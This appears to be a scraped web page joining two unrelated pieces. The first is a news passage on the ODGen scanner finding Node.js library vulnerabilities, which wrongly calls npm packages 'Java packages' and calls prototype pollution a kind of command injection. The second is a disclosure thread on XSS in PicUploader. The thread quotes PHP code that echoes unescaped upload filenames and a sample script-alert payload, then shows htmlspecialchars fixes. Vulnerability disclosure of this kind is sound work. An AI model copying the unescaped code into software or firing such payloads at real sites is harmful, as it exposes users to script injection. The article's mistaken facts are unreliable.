The Object Dependence Graph that the researchers have proposed refines this approach by representing JavaScript objects as nodes and adding features — including dependencies between objects — that are specific to the programming language, and then querying for errors. Cao describes how the method works using grains in a handful of rice: If all the grains look the same before boiling but assume two different shades after boiling — one representing good grains and the other bad grains — then it becomes easier to spot and weed out the bad grains. "Abstract interpretation is kind of like the boiling process that converts rice — that is, programs — into different colored objects" so errors are easier to spot, Cao says.

**A Variety of Bugs**

To see if their approach works, the researchers first tested ODGen against a sample of 330 previously reported vulnerabilities in Node.js packages on the node package manager (npm) repository. The test showed the scanner correctly identifying 302 of the 330 vulnerabilities. Buoyed by the relatively high accuracy rate, the researchers ran ODGen against some 300,000 Java packages in npm. The scanner reported a total of 2,964 potential vulnerabilities across the packages. The researchers checked 264 of them — all with more than 1,000 downloads per week on average — and were able to confirm 180 as being legitimate vulnerabilities. Forty-three of them were at the application level, 122 were in packages that are imported by other applications or code, and the remaining 15 were present in indirect packages.

A plurality (80) of the confirmed vulnerabilities that ODGen detected were command injection flows that allow attackers to execute arbitrary code at the operating system level via a vulnerable application. Thirty were path traversal flaws; 24 enabled code tampering, and 19 involved a specific type of command injection attack called prototype pollution.

New ODGen Tool Unearths 180 Zero-Days in Node.js Libraries

PicUploader v2.6.3 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /master/index.php.

Hello,

I would like to report for possible XSS vulnerability.

In file https://github.com/xiebruce/PicUploader/blob/master/index.php

$data = \[
	'code' => 'success',
	'data' => \[
		'filename' => $\_FILES\['file'\]\['name'\],
		'url' => $isWeb ? $link\['formatLink'\] : $link,
              //专用于web上传，其它客户端上传该参数无用
              'notFormatUrl' => $isWeb ? $link\['notFormatLink'\] : '',
	\],
\];

header('Content-Type: application/json; charset=UTF-8');
$json = json\_encode($data, JSON\_UNESCAPED\_UNICODE);
echo $json;

It is possible to do the injection with the name of the file through $\_FILES\['file'\]\['name'\].

Thank you for reporting, I add a htmlspecialchars() to convert something like <script>alert('sdfds')</script> to html entities.

htmlspecialchars($\_FILES\['file'\]\['name'\])

Don't know if this can solve the issue?

Thank you for your response.

Yes exactly that solve the issue.

I would like also to mention to security issue in https://github.com/xiebruce/PicUploader/blob/master/settings/SettingController.php

public function getStorageParams($params){
		$key = $params\['key'\];
		$jsonFile = $this\->storagesDir.'/storage-'.$key.'.json';
		if(is\_file($jsonFile)){
			$columns = json\_decode(file\_get\_contents($jsonFile), true);
			$code = 0;
		}else{
			//....
		}
		unset($columns\['name'\]);
		
		$returnArr = \[
			'code' => $code,
			'data' => $columns,
		\];
		//....
		return json\_encode($returnArr);
	}
	
	public function setStorageParams($params){
		//...
               $config = json\_encode($\_POST, JSON\_UNESCAPED\_SLASHES);
                //...
                $config = str\_replace('\\u202a', '', $config);
		file\_put\_contents($jsonFile, $config);
		//....
	}

You are saving the $\_POST in a file through the function getStorageParams without sanitization. Then you use the function getStorageParams to retrieve the information. Are you using this file in your project ? if yes, we need to sanitize the input.

Thank you so much, now I update the code as below

$post = \[\];
foreach($\_POST as $key\=>$val){
	$post\[$key\] = htmlspecialchars($val);
}
$config = json\_encode($post, JSON\_UNESCAPED\_SLASHES);

Tag

#php